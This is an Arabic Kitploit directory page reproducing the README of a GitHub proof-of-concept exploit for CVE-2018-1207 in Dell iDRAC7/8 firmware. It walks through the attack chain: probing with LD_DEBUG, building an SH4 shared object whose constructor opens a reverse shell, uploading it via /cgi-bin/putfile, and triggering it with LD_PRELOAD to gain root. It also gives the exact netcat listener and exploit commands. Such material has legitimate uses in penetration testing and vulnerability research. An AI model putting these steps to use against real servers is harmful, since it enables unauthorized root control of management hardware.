Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-1207-better — قشرة عكسية CVE لـ iDRAC 7 & 8 مع البرنامج الثابت 2.52.52.52 وأقل. | Kitploit
أدوات/GitHubGitHub/hironull/cve-2018-1207-better
أمان الأنظمة المدمجةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن الأجهزةالتعلم والتعليمأداة الوصول عن بعداستغلال الملفات الثنائية
GitHubhironull/cve-2018-1207-better

CVE-2018-1207-better

قشرة عكسية CVE لـ iDRAC 7 & 8 مع البرنامج الثابت 2.52.52.52 وأقل.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لاستغلال CVE-2018-1207: Dell iDRAC7/iDRAC8 RCE (شل عكسية)

يحتوي هذا المستودع على نص بايثون لإثبات المفهوم يوضح استغلالًا لتنفيذ تعليمات عن بعد موجود في أجهزة iDRAC7 و iDRAC8 بإصدارات البرامج الثابتة 2.52.52.52 وأقل. يسمح هذا الاستغلال للمهاجمين بتشغيل تعليمات كمستخدم جذر، مما قد يؤدي إلى السيطرة الكاملة على النظام. في الكود، نظهر هذا من خلال تشغيل هجوم شل عكسية باستخدام الاستغلال. الكود في هذا المستودع هو نسخة معدلة من الاستغلال الأصلي لمايكل جارجيولو (mgargiullo).

إخلاء مسؤولية - يتم توفير هذا الكود لأغراض تعليمية فقط. لا يجوز لك استخدام هذا البرنامج النصي لمهاجمة أجهزة لا تملكها أو ليس لديك إذن صريح ومكتوب للقيام بذلك. استخدام هذا البرنامج النصي على أنظمة دون إذن مناسب هو غير قانوني. لست مسؤولًا عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة. الاستخدام غير المصرح به يمكن أن يؤدي إلى عواقب قانونية شديدة، بما في ذلك الغرامات والسجن.

كيف يعمل هذا الاستغلال؟

  1. يتحقق الاستغلال أولاً مما إذا كان الهدف عرضة للخطر. يفعل ذلك عن طريق إرسال طلب إلى صفحة تسجيل الدخول مع معامل خاص: ?LD_DEBUG=files. إذا تضمن الرد محتوى تصحيح يوضح ملفات المكتبات التي يحاول تحميلها، فإننا نعلم أنه عرضة للخطر.
  2. بمجرد اكتمال الفحص وتأكدنا من أن الجهاز عرضة للخطر، يقوم البرنامج النصي بإنشاء ملف يحتوي على كود C، والذي سيشغله الجهاز عند تشغيل الاستغلال مما يؤدي إلى اتصال شل عكسية.
  3. ثم نقوم بتجميع الملف الذي تم إنشاؤه مع كود C باستخدام sh4-linux-gnu-gcc. نظرًا لأن iDRAC يعمل على معمارية معالج SuperH (SH4)، نحتاج إلى تجميع الكود في كائن مشترك (.so) بحيث يمكن تنفيذه بواسطة iDRAC.
  4. بمجرد اكتمال التجميع، يمكننا رفع الملف عن طريق إرسال طلب POST إلى /cgi-bin/putfile حيث يحفظ الملف في /tmp/sshpkauthupload.tmp.
  5. بعد رفع الملف، نرسل طلب GET آخر إلى /cgi-bin/discover مع المعامل ?LD_PRELOAD=/tmp/sshpkauthupload.tmp. هذا يجبر iDRAC على تحميل مكتبة محددة قبل أي مكتبة أخرى، ثم يقوم بتحميل ملف .so المعدل من دليل /tmp/.
  6. نظرًا لأن كود الحمولة موجود في دالة constructor، يتم تشغيل الكود فورًا عند التحميل، مما يؤدي إلى شل عكسية كمستخدم root (المستخدم ذو الصلاحيات الأعلى في نظام يعتمد على لينكس).

المتطلبات

قبل تشغيل البرنامج النصي، يرجى التأكد من توفر ما يلي:

  • Python3
  • وحدة requests الخاصة بـ Python3 (يمكن تثبيتها عبر pip install requests)
  • مترجم C عبر التجميع SH4 (يمكن تثبيته عبر sudo apt install gcc-sh4-linux-gnu)

بدون هذه المتطلبات، ستواجه مشاكل ولن يتمكن الاستغلال من العمل بالكامل! لا توجد فحوصات لضمان تلبية هذه المتطلبات.

الاستخدام

  1. ابدأ مستمعًا على جهازك لاستقبال الشل العكسية، استخدم netcat لهذا.

    root@kitploit:~
    nc -lvnp <LPORT>
    

    استبدل <LPORT> بالمنفذ الذي تريد الاستماع عليه (مثل 5000).

  2. قم بتشغيل البرنامج النصي بالوسائط المطلوبة.

    root@kitploit:~
    python3 cve-2018-1207.py --rhost <RHOST> --rport <RPORT> --lhost <LHOST> --lport <LPORT>
    

الوسائط

  • --rhost: عنوان IP لجهاز iDRAC المستهدف.
  • --rport: منفذ واجهة الويب الخاصة بـ iDRAC (عادةً 443).
  • --lhost: عنوان IP المحلي الخاص بك لاتصال الشل العكسية للعودة إليه.
  • --lport: المنفذ المحلي الذي يعمل عليه مستمع Netcat.
  • --keep-payload: (اختياري) إذا تم تعيينه، لن يقوم البرنامج النصي بحذف payload.c و payload.so من جهازك بعد التنفيذ.

مثال

  1. جهاز المهاجم (IP: 192.168.1.100) - ابدأ المستمع.

    root@kitploit:~
    nc -lvnp 5000
    
  2. جهاز المهاجم - قم بتشغيل الاستغلال مستهدفًا iDRAC عند 192.168.1.50.

    root@kitploit:~
    python3 cve-2018-1207.py --rhost 192.168.1.50 --rport 443 --lhost 192.168.1.100 --lport 5000
    

    في حالة النجاح، ستتلقى جلسة شل في نافذة Netcat الخاصة بك حيث يمكنك تشغيل أوامر مثل racadm.

تنزيل الأداة